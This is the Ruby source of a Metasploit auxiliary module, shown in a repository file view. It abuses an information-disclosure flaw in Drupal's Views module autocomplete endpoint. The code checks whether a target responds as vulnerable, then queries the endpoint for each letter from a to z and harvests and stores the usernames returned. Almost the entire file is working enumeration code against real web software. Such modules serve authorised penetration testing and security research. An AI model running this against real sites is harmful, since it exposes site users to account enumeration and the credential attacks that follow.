metasploit-framework/modules/auxiliary/scanner/http/drupal_views_user_enum.rb

123 lines
2.9 KiB
Ruby
Raw Normal View History

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
2012-02-20 22:28:19 +00:00
include Msf::Auxiliary::WmapScanServer
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal Views Module Users Enumeration',
'Description' => %q{
This module exploits an information disclosure vulnerability in the 'Views'
module of Drupal, brute-forcing the first 10 usernames from 'a' to 'z'
},
'Author' =>
[
'Justin Klein Keane', #Original Discovery
'Robin Francois <rof[at]navixia.com>',
'Brandon McCann "zeknox" <bmccann [at] accuvant.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'http://www.madirish.net/node/465'],
],
'DisclosureDate' => 'Jul 2 2010'
))
register_options(
[
2012-03-18 05:07:27 +00:00
OptString.new('PATH', [true, "Drupal Path", "/"])
], self.class)
end
def check(base_uri)
res = send_request_cgi({
'uri' => base_uri,
'method' => 'GET',
'headers' => { 'Connection' => 'Close' }
}, 25)
if not res
return false
elsif res.message != 'OK' or res.body != '[ ]'
return false
else
return true
end
end
def run_host(ip)
# Make sure the URIPATH begins with '/'
if datastore['PATH'][0] != '/'
datastore['PATH'] = '/' + datastore['PATH']
end
# Make sure the URIPATH ends with /
if datastore['PATH'][-1] != '/'
datastore['PATH'] = datastore['PATH'] + '/'
end
enum_uri = datastore['PATH'] + "?q=admin/views/ajax/autocomplete/user/"
# Check if remote host is available or appears vulnerable
if not check(enum_uri)
2012-02-20 22:28:19 +00:00
print_status("#{ip} does not appear to be vulnerable, will not continue")
return
end
print_status("Begin enumerating users at #{ip}")
results = []
('a'..'z').each do |l|
vprint_status("Iterating on letter: #{l}")
res = send_request_cgi({
'uri' => enum_uri+l,
'method' => 'GET',
'headers' => { 'Connection' => 'Close' }
}, 25)
if (res and res.message == "OK")
user_list = res.body.scan(/\w+/)
if user_list.empty?
vprint_status("\tFound: Nothing")
else
vprint_status("\tFound: #{user_list.inspect}")
results << user_list
end
else
print_error("Unexpected results from server")
return
end
end
final_results = results.flatten.uniq
print_status("Done. " + final_results.length.to_s + " usernames found...")
final_results.each do |user|
print_good("Found User: #{user}")
store_loot(
type,
'text/plain',
Rex::Socket.getaddress(datastore['RHOST']),
user,
'drupal_user.txt',
user
)
end
end
end